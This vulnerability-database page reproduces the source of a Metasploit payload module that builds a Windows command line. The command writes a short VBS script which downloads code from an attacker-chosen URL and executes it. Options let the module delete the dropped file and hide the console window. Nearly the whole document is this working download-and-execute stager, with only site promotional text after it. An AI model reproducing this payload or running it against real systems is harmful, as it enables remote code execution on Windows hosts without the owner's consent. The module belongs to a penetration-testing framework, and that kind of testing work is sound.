Lucene search
K

Windows Executable Download and Evaluate VBS

🗓️ 11 Jun 2011 20:37:08Reported by scriptjunkieType 
metasploit
 metasploit
🔗 www.rapid7.com👁 47 Views

Windows Executable Download and Evaluate VBS module for Metasploit framework that downloads a file from an HTTP(S) URL and executes it as a VBS scrip

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


module MetasploitModule

  CachedSize = :dynamic

  include Msf::Payload::Single
  include Msf::Sessions::CommandShellOptions

  def initialize(info = {})
    super(merge_info(info,
      'Name'        => 'Windows Executable Download and Evaluate VBS',
      'Description' => 'Downloads a file from an HTTP(S) URL and executes it as a vbs script.
            Use it to stage a vbs encoded payload from a short command line. ',
      'Author'      => 'scriptjunkie',
      'License'     => BSD_LICENSE,
      'Platform'    => 'win',
      'Arch'        => ARCH_CMD,
      'Handler'     => Msf::Handler::None,
      'Session'     => Msf::Sessions::CommandShell,
      'PayloadType' => 'cmd',
      'RequiredCmd' => 'wscript',
      'Payload'     =>
        {
          'Offsets' => { },
          'Payload' => ''
        }
      ))

    register_options(
      [
        OptString.new('URL', [ true, "The pre-encoded URL to the script" ]),
        OptBool.new('INCLUDECMD', [ true, "Include the cmd /q /c", false ]),
        OptBool.new('INCLUDEWSCRIPT', [ true, "Include the wscript command", false ]),
        OptBool.new('DELETE', [ true, "Delete created .vbs after download", false ])
      ])
  end

  def generate(_opts = {})
    return super + command_string
  end

  def command_string
    # Keep variable names short.
    vbsname = Rex::Text.rand_text_alpha(1+rand(2))
    xmlhttpvar = Rex::Text.rand_text_alpha(1+rand(2))

    command = ''
    command << "cmd.exe /q /c " if datastore['INCLUDECMD']
    command << "cd %tmp%&echo Set #{xmlhttpvar}=CreateObject(\"Microsoft.XMLHTTP\"):"+
      "#{xmlhttpvar}.Open \"GET\",\"#{datastore['URL']}\",False:"+
      "#{xmlhttpvar}.Send:"+
      "Execute #{xmlhttpvar}.responseText"
    command << ":CreateObject(\"Scripting.FileSystemObject\").DeleteFile \"#{vbsname}.vbs\"" if datastore['DELETE']

    # "start #{vbsname}.vbs" instead of just "#{vbsname}.vbs" so that the console window
    # disappears quickly before the wscript libraries load and the file downloads
    command << " >#{vbsname}.vbs"+
      "&start "
    command << "wscript " if datastore['INCLUDEWSCRIPT']
    command << "#{vbsname}.vbs"
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation